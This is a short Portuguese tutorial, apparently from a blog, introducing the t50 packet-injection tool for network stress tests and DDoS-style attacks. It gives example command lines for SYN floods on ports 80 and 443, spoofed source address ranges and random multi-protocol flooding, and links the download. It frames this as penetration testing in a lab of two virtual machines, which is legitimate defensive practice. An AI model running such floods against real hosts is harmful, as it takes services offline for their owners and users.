Conhea o t50: Ferramenta

para stress test (Pentest

DDoS)!
O t50, uma ferramenta desenvolvida pelo brasileiro Nelson Brito, na prtica um
software capaz de realizar stress tests em redes ou servidores especficos utilizando
a tcnica de injeo de pacotes mesclando at 15 protocolos diferentes (TCP, UDP,
ICMP, IGMPv2, IGMPv3, EGP, DCCP, RSVP, RIPv1, RIPv2, GRE, ESP, AH, EIGRP,
OSPF, etc). Em outras palavras, qualquer sysadmin pode utilizar esta ferramenta
para realizar testes de penetrao em servidores utilizando um mix de ataques do
tipoDDoS (Distributed Denial of Service) Basicamente como ocorreu nos
episdios dos ltimos dias em sites do governo federal, quando crackers utilizaram
tcnicas do tipo. Obviamente que, como toda ferramenta do gnero, o t50 pode ser
utilizado tanto pelo lado negro da fora, quanto para antever falhas crticas de
segurana nos servios que rodam na sua rede.
Como usar
Vamos explorar um pouco o T50

./t50 192.168.1.10 --flood --turbo --dport (80 443) -S --protocol TCP

Neste o atacante flooda o IP, adiciona turbo, ataca as portas 80 e 443, usando apenas SYN no protocolo
TCP
./t50 192.168.1.12 --flood --turbo --dport (80) -S -s 10.10.0. --protocol TCP
Neste o atacando flooda o IP, adiciona turbo, ataca a porta 80 usando apenas SYN e mascara a origem
com o range 10.10.0.x no protocolo TCP
--protocol T50
Faz um random de todos os protocolos
--sport 80 --dport 443
Ataca atravs da porta de origem 80 no alvo 443
Quanto mais especfico o ataque melhor, mais destrutivo.

Faa um teste, crie 2 maquinas virtuais e faa o ataque.

Monitore com o Htop ou iptraf e vc ver a diferena
Download http://sourceforge.net/projects/t50/